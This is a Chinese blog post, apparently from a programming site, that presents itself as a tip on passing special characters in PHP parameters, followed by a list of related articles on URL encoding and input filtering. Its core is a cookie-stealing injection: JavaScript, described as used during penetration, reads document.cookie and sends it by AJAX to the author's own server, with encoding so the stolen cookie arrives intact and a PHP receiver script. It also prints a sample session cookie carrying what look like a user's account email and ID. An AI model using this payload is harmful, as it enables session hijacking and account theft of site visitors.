php参数特殊字符,Php提交包含特殊字符的参数的方法

最新推荐文章于 2021-04-07 15:27:49 发布
最新推荐文章于 2021-04-07 15:27:49 发布
阅读量274 收藏
点赞数
文章标签: php参数特殊字符

在渗透的过程中,可以在网页中插入JS代码来获取cookie:document.cookie

那么获取到的cookie如何传到我们自己的服务器呢?

在这里,我使用的是AJAX技术。但是Ajax有一个跨域的问题,所以需要再http头部再进行设置。这里主要讲cookie的提交。

先看一段JS代码:

xmlhttp.open("GET","http://192.168.17.63/HelloPhp/receiveCookie.php?cookie="+document.cookie,true);

这里将从网页获取到的cookie提交到receiveCookie.php上,其中cookie有一部分是这样的:

ULV=1450275143055:1:1:1:182.138.174.191_1450275139.121259:;SGUID=1450275146558_35957829; vjuids=-37098b091.151ab228f90.0.920dc7c7;vjlast=1450275148;SUP=cv%3D1%26bt%3D1450275168%26et%3D1450361568%26d%3D40c3%26i%3D2611%26us%3D1%26vf%3D0%26vt%3D0%26ac%3D2%26st%3D0%26lt%3D1%26uid%3D2277147785%26user%3D493354115%2540qq.com%26ag%3D4%26name%3D493354115%2540qq.com%26nick%3D%25E7%25BB%25BF%25E8%258C%25B66888%26sex%3D1%26ps%3D0%26email%3D%26dob%3D%26ln%3D493354115%2540qq.com%26os%3D%26fmp%3D%26lcp%3D;SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9W5o5Vidv35CH47We9hTzl.1;

ALF=1481811169;

那么提交的过程中遇到特殊字符"%","&"等,就会自动解析,导致传参数错误。

解决的办法是:

var cookie = document.cookie;

cookie = escape(encodeURIComponent(cookie));

xmlhttp.open("GET","http://192.168.17.63/HelloPhp/receiveCookie.php?cookie="+cookie,true);

在receiveCookie.php接收即可:

$cookie = $_GET["cookie"];

$cookie = (urldecode($cookie));

以上就介绍了Php提交包含特殊字符的参数的方法,包括了方面的内容,希望对PHP教程有兴趣的朋友有所帮助。

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

weixin_39781594
关注
PHP对表单提交特殊字符的过滤和处理
紫云的博客
06-09 2万+
php编码转换
php url特殊符号处理,url参数中有+、空格、=、%、&等特殊符号的处置
weixin_42514537的博客
03-18 1395
url参数中有+、空格、=、%、&、#等特殊符号的处理url参数中有+、空格、=、%、&、#等特殊符号的问题解决?解决办法:将这些字符转化成服务器可以识别的字符,对应关系如下:URL字符转义+ URL 中+号表示空格 %2B空格 URL中的空格可以用+号或者编码 %20/ 分隔目录和子目录 ...
Php提交包含特殊字符参数方法
cz493354115的专栏
12-26 769
在渗透的过程中,可以在网页中插入JS代码来获取cookie :document.cookie 那么获取到的cookie如何传到我们自己的服务器呢?   在这里,我使用的是AJAX技术。但是Ajax有一个跨域的问题,所以需要再http头部再进行设置。这里主要讲cookie的提交。   先看一段JS代码:   xmlhttp.open("GET","http://192.168.17.
php参数特殊字符,php过滤参数特殊字符防注入
weixin_36242131的博客
03-11 224
本节内容:php过滤特符字符,php防注入。in: 后端程序例子: 代码示例:/*** 安全防范过滤php的$_GET 和$_POST参数*/function Add_S($array){foreach($array as $key=>$value){if(!is_array($value)){$value = get_magic_quotes_gpc()?$value:addslashes...
php获取URL中#号等特殊符号参数的解决方法
10-25
主要介绍了php获取URL中#号等特殊符号参数的解决方法,本文使用JS中的escape函数编码后传递解决这个问题,需要的朋友可以参考下
jQuery 实现ajax传入参数含有特殊字符方法总结
10-21
然而,当这些参数包含一些特殊字符时,比如美元符号($)、井号(#)、和号(&)等,就可能出现数据无法正确传递或者被错误解析的问题。本文将针对这一问题,提供解决方案和最佳实践。 首先,要理解在HTTP请求中,参数...
PHP字符串中特殊符号的过滤方法介绍
12-19
这篇文章主要介绍了一种使用`str_replace`函数来过滤PHP字符串中特殊字符方法。下面我们将深入探讨这个话题。 `str_replace`函数是PHP内置的一个字符串函数,它用于在字符串中查找并替换指定的目标字符或字符串。...
php中url传递中文字符,特殊危险字符的解决方法
12-18
Base64是一种用于将二进制数据编码为ASCII字符串的方法,可以包含字母、数字和两个特殊符号'/'和'+'。然而,这两个字符在URL中是不安全的,因为它们有特殊的含义。 4. **Base64与URL兼容性**: - 在URL中使用Base...
php参数特殊字符,PHP中URL中特殊字符引起的问题(+,=) 分析及解决方法
weixin_33199783的博客
03-11 605
前言,在做一个登录的过程中,发现个别账号验证通不过,仔细排查后发现是接收的参数进行了urldecode处理,使得某些特殊字符如加号’+‘变成了空格,以至于影响到了后面的数据。下面来看看代码。get 方法代码function get($key = null, $default = null) {if (is_null($key)) {foreach ($_GET as $key => $val...
phppost请求传递1个空对象参数特殊字符 {}
qq_39835505的博客
04-07 1102
HttpGet 或 HttpPost 都不能传包含 ” 、“{“、”}”这样的参数,需要对特殊字符进行转义, 把 ” 转成%22,把 { 转成%7b,把 } 转成%7d String url = "http://127/signal/Resource?param={\"name\":\"service1\",\"param\":{\"id\":\"1\"}}"; url = url.replace("\"", "%22").replace("{", "%7b").replace("}",
php $_post特殊字符,PHP对全局变量_GET、_POST特殊字符的过滤
weixin_39777497的博客
03-09 218
$sVariablesOrder = ini_get( ‘variables_order‘ );$request = array();//过滤不安全数据for ( $i = 0; $i < strlen( $sVariablesOrder ); $i++ ){$cVariableFlat = strtolower( $sVariablesOrder[$i] );...
php url特殊符号,php获取URL中#号等特殊符号参数的解决方法
weixin_42101056的博客
03-27 487
例如下面的PHP代码:复制代码 代码如下:echo $_GET['key'];?>当url为http://test.com/c.php?key=999时,正常输出:999当url为http://test.com/c.php?key=9#888时,只能输出:9而我想要获得的是9#888,那要怎么办呢?只能在把9#888传递给key的这个环节想办法。我是用JS中的escape函数编码后传递解决了...
PHP中GET/POST方法参数传递空格+逗号等特殊字符处理办法
qq_25600055的专栏
10-30 1万+
自己在项目开发中写了个自用接口,用GET方法传参(用户名和密码)。最近收到用户反馈:密码为特殊字符时会出错。我一开始想是不是php的mysql_real_escape_string函数将特殊字符转义了,但用户说自己密码只有“+”号这个特殊字符,而“+”号不属于该函数转义的范围之内。 为了弄明白这个问题我就在本地测试了一下,果然发现有bug。 测试代码: index.php ec
php接收+号等特殊字符参数的问题
梁吉林的博客
04-12 6102
记录一个有些奇怪的问题,关于参数“+”号在传输过程中是否被转义。 1、get方式请求 使用get方式,php收到的参数中“+”会变为空格,看说明应该是执行了urldecode,如果需要恢复为“+”号,需要对接收到的参数进行urlencode。 通过使用curl和浏览器方式,接收到的参数均把+号转为了空格。 请求地址为http://ip/xx?aa=+889 使用 $_REQUEST[...
php url 编码 符号,php获取URL中#号等特殊符号参数方法
weixin_42490307的博客
03-11 461
本文主要和大家介绍了php获取URL中#号等特殊符号参数的解决方法,本文使用JS中的escape函数编码后传递解决这个问题,需要的朋友可以参考下,希望能帮助到大家。今天遇到一个前端用vle.js的#号路径需要调转到后台接口获取参数,再由接口url返回当前页面前端将要返回的url今天转义用函数escapekeys = escape(keys); //对字符串进行编码,* @ - _ + . / ...
PHP Get请求URL中参数包含空格
weixin_33796205的博客
08-06 538
比如有一个Get请求,URL是:www.vonvey.com/example?test para=hello,此URL中包含一个参数参数名为test para(中间包含空格)。 那如何在PHP代码中获取test para参数呢? 打印出预定义变量$_GET发现,可以用$_GET['test_para']获取到test para传入的值hello。 转载于:ht...
PHP过滤所有特殊字符的函数
gdali的专栏
12-07 1万+
在中文用户名时用到。 function replace_specialChar($strParam){ $regex = "/\/|\~|\,|\。|\!|\?|\“|\”|\【|\】|\『|\』|\:|\;|\《|\》|\’|\‘|\·|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\{|\}|\:|\|\?|\[|\]|\,|\.|\/|\;|\'|\`|\
在传参时,url参数包含+、空格、=、%、&、#等特殊符号的处理
热门推荐
一个大龄码农的专栏
02-13 1万+
最近在工作中遇到一些问题,就是如果表单中填写一些特殊字符,使用url向后台传参的时候会遇到问题,就是比如"#$%^&*()+"等特殊字符传不到后台,查了一些资料,整理下,供参考     首先可以先将特殊字符转码为16进制的对应的转码为    url参数中有+、空格、=、%、&、#等特殊符号的问题解决?   解决办法:   将这些字符转化成服务器可以识别的字符,对应关系如下: 
PHP CLI模式下参数接收:argv与getopt方法解析
`options`参数是一个字符串,其中每个字符代表一个短格式选项,如`x`表示`-x`选项。`longopts`参数是一个数组,用于定义长格式选项,如`['type=>'t', 'is_hot=>'h', 'limit=>'l']`。 例如,更新`test.php`如下: `...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值